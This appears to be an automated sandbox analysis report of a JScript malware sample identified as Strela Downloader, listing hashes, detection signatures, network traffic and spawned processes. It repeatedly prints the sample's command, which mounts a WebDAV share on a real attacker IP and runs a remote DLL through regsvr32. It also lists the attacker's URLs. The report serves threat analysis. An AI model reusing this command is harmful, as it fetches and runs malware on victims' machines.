Windows Analysis Report
6042109671038401.js

Overview

General Information

Sample name: 6042109671038401.js
Analysis ID: 1560608
MD5: 98fca8fcdd0ca4d9d83555adf84688db
SHA1: dc66af5b91a9096d51cfc8de1aaee9348f705bf0
SHA256: 1066efeee0ce0091820dc442b31f9739b3147771893f2bddc07aa15d7d1fcfbe
Tags: jsuser-cocaman
Infos:

Detection

Strela Downloader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Strela Downloader
Gathers information about network shares
JavaScript file contains Antivirus product strings
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

AV Detection

barindex
Source: http://94.159.113.79:8888/B Avira URL Cloud: Label: phishing
Source: http://94.159.113.79:8888/f Virustotal: Detection: 13% Perma Link
Source: 6042109671038401.js Virustotal: Detection: 17% Perma Link

Networking

barindex
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 94.159.113.79:8888
Source: Joe Sandbox View IP Address: 94.159.113.79 94.159.113.79
Source: Joe Sandbox View ASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.79
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.79
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.79
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.79
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.113.79
Source: net.exe, 00000003.00000002.1709612667.000001883162C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.79:8888/
Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.79:8888/B
Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.79:8888/Z
Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.79:8888/f
Source: net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.79:8888/pace
Source: net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.79:8888/wL
Source: net.exe, 00000003.00000002.1709612667.000001883160C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://94.159.113.79:8888/z

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: Yara match File source: amsi64_5288.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5288, type: MEMORYSTR

System Summary

barindex
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: 6042109671038401.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winJS@6/0@0/1
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 6042109671038401.js Virustotal: Detection: 17%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6042109671038401.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\ Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\net.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.11", "0", "false")

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 8888
Source: unknown Network traffic detected: HTTP traffic on port 8888 -> 49730
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\net.exe TID: 4304 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: net.exe, 00000003.00000002.1709612667.0000018831639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`]1
Source: net.exe, 00000003.00000002.1709612667.00000188315E0000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000003.00000002.1709612667.0000018831639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 6042109671038401.js Initial file: drweb, eset, avg
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\ Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.79@8888\davwwwroot\ && regsvr32 /s \\94.159.113.79@8888\davwwwroot\18238315982036.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net use \\94.159.113.79@8888\davwwwroot\ Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs